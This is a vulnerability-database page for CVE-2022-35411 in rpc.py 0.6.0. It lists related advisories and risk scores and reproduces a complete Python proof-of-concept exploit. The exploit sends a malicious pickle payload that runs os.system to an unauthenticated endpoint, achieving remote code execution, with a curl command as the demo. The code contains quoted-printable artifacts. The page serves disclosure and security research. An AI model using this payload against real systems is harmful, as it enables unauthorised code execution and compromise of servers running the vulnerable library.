Vulners
Lucene search
rpc.py 0.6.0 - Remote Code Execution (RCE)
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | rpc.py 0.6.0 - Remote Code Execution Exploit | 31 Jul 202200:00 | – | zdt |
 | Exploit for Insufficiently Protected Credentials in Rpc.Py_Project Rpc.Py | 5 Jul 202219:00 | – | githubexploit |
| Exploit for Insufficiently Protected Credentials in Rpc.Py_Project Rpc.Py | 14 Apr 202404:08 | – | githubexploit |
| Exploit for Insufficiently Protected Credentials in Rpc.Py_Project Rpc.Py | 28 Jul 202509:26 | – | githubexploit |
 | CVE-2022-35411 | 8 Jul 202219:15 | – | attackerkb |
 | CVE-2022-35411 | 8 Jul 202222:18 | – | circl |
 | rpc.py 代码问题漏洞 | 8 Jul 202200:00 | – | cnnvd |
 | rpc.py Project Remote Code Execution (CVE-2022-35411) | 17 Nov 202200:00 | – | checkpoint_advisories |
 | CVE-2022-35411 | 8 Jul 202218:07 | – | cve |
 | CVE-2022-35411 | 8 Jul 202218:07 | – | cvelist |
10
# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411
import requests
import pickle
# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
HOST =3D "127.0.0.1:65432"
URL =3D f"http://{HOST}/sayhi"
HEADERS =3D {
"serializer": "pickle"
}
def generate_payload(cmd):
class PickleRce(object):
def __reduce__(self):
import os
return os.system, (cmd,)
payload =3D pickle.dumps(PickleRce())
print(payload)
return payload
def exec_command(cmd):
payload =3D generate_payload(cmd)
requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)
def main():
exec_command('curl http://127.0.0.1:4321')
# exec_command('uname -a')
if __name__ =3D=3D "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jul 2022 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
CVSS 3.19.8
EPSS0.71334